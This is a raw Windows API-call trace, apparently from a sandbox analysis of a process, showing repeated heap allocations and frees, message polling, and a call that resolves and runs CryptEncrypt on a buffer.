RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0252.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0252.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0252.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0252.074] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0252.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0252.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0252.074] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0252.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0252.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0252.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0252.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0252.074] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0252.074] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0252.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0252.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0252.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0252.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0252.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0252.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0252.074] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0252.074] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0252.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0252.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0252.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0252.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55f80 [0252.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0252.075] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0252.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55f80 | out: hHeap=0x970000) returned 1 [0252.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0252.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51898 [0252.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0252.075] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0252.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0252.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0252.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0252.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0252.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0252.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0252.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0252.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0252.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0252.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0252.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0252.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0252.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0252.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0252.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0252.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0252.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0252.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0252.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0252.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0252.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0252.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0252.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0252.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0252.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0252.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0252.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0252.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0252.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0252.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0252.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0252.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0252.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0252.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0252.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0252.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0252.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0252.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0252.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0252.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0252.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0252.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0252.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0252.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0252.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0252.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0252.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0252.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0252.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0252.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0252.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0252.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0252.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0252.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0252.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0252.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0252.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0252.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0252.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0252.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0252.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0252.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0252.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0252.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0252.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb42a) returned 0x2f35cb8 [0252.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0252.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f35cb8 | out: hHeap=0x970000) returned 1 [0252.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0252.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0252.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0252.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0252.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0252.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0252.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0252.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0252.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e558d8 [0252.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0252.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0252.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0252.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0252.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0252.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0252.079] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0252.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0252.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0252.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0252.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0252.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0252.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0252.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0252.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0252.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0252.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0252.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0252.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0252.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0252.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0252.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0252.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0252.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0252.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0252.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0252.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0252.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0252.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0252.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0252.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0252.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0252.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0252.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0252.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0252.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0252.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0252.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0252.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0252.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0252.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0252.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0252.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0252.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0252.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0252.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0252.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0252.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0252.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0252.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0252.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0252.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0252.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0252.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0252.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0252.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0252.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0252.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0252.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0252.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0252.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0252.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0252.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0252.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0252.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0252.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0252.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0252.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0252.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0252.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0252.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0252.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0252.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0252.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0252.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0252.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0252.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0252.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0252.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0252.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0252.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0252.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0252.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0252.082] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0252.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e51a90 [0252.082] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51a90, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0252.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0252.082] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0252.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0252.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0252.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e54440 [0252.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0252.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0252.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0252.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0252.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0252.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0252.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0252.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0252.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0252.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0252.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0252.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0252.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0252.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0252.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0252.083] CryptEncrypt (in: hKey=0xa86f90, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0xb42a, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0xb430) returned 1 [0252.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0252.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0252.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0252.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0252.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0252.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0252.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0252.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0252.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0252.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0252.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0252.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0252.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0252.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0252.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0252.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0252.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0252.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0252.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0252.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0252.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0252.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0252.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0252.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 